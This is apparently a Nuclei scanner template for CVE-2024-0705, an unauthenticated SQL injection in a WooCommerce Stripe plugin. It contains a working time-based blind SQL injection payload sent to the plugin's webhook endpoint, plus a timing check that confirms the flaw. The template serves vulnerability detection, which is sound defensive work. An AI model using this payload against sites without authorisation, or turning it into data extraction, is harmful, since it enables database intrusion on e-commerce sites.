id: CVE-2024-0705 info: name: Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection author: Shivam Kamboj severity: critical description: | Stripe Payment Plugin for WooCommerce for WordPress versions up to 3.7.9 contains a sql_injection caused by insufficient escaping and lack of preparation on 'id' parameter, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires sending crafted 'id' parameter. remediation: | Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability. impact: | Attackers can execute arbitrary SQL queries, potentially leading to data disclosure or modification of sensitive database information. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-0705 - https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve metadata: verified: true max-request: 1 publicwww-query: "plugins/payment-gateway-stripe-and-woocommerce-integration/" tags: cve,cve2024,wp-plugin,wp,wordpress,woocommerce,stripe,sqli,unauth,time-based flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'contains(body, "payment-gateway-stripe")' - 'status_code == 200' condition: and internal: true - raw: - | @timeout: 10s POST /?wc-api=wt_stripe HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"type":"charge.succeeded","data":{"object":{"id":"sqli_test' AND (SELECT 1 FROM (SELECT SLEEP(6))a)#","metadata":{"order_id":"999999"}}}} matchers: - type: dsl dsl: - 'duration >= 6' - 'status_code == 200' condition: and # digest: 490a00463044022016a8f39a483086cb723a70472fc1b9e9e03c54f04f39acf8999ef20f420f33140220077b732ba43da08f8f739ae6a0f28c58e4c298a92cc0b1b34cd8584a3bd31b42:922c64590222798bb761d5b6d8e72950